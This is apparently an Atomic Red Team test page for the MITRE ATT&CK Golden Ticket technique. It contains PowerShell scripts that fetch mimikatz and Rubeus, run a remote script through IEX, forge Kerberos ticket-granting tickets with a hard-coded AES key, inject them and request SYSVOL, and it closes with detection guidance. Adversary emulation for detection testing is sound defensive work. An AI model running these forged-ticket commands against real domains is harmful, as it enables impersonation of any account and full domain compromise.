# T1558.001 - Golden Ticket
Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) 

Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)

The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.

## Atomic Tests

### Atomic Test #1 - Crafting Active Directory golden tickets with mimikatz
Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})

##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath

```

In [ ]:
Invoke-AtomicTest T1558.001 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore

# get current domain SID if default was used
$domain_sid = "S-1-5-21-DEFAULT"
If ($domain_sid -Match "DEFAULT") {
  # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
  $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
  $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
  $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}

# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
  echo Purge existing tickets and create golden ticket:
  klist purge
  $env:TEMP\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:goldenticketfakeuser /ptt" "exit"

  echo.
  echo Requesting SYSVOL:
  dir \\%userdnsdomain%\SYSVOL
  
  echo.
  echo Tickets after requesting SYSVOL:
  klist

  echo.
  echo End of Golden Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat

# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null

# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
    if ($_ -match 'End of Golden Ticket attack') { break } 
  }
} while ($false) # dummy loop so that 'break' can be used

# show output from new empty session
Get-Content $env:TEMP\golden.txt

# cleanup temp files
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1558.001 -TestNumbers 1

### Atomic Test #2 - Crafting Active Directory golden tickets with Rubeus
Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined

##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually

```
##### Description: Rubeus must exist

##### Check Prereq Commands:
```powershell
if(Test-Path -Path $Env:temp\rubeus.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-Webrequest -Uri https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe -OutFile $Env:temp\rubeus.exe

```

In [ ]:
Invoke-AtomicTest T1558.001 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore

cmd.exe /c "$Env:temp\rubeus.exe" golden /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /ldap /user:$ENV:username /dc:$($ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain") /printcmd /outfile:golden
$filename = (Get-ChildItem | ? {$_.Name.startswith("golden_")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name

# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
  echo Purge existing tickets and create golden ticket:
  klist purge
  cd %temp%
  "$Env:temp\rubeus.exe" ptt /ticket:kirbifile

  echo.
  echo Requesting SYSVOL:
  dir \\$($ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain")\SYSVOL
  
  echo.
  echo Tickets after requesting SYSVOL:
  klist

  echo.
  echo End of Golden Ticket attack
)
"@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat

# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null

# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
    if ($_ -match 'End of Golden Ticket attack') { break } 
  }
} while ($false) # dummy loop so that 'break' can be used

# show output from new empty session
Get-Content $env:TEMP\golden.txt

# cleanup temp files
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1558.001 -TestNumbers 2

## Detection
Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)

Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)

Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
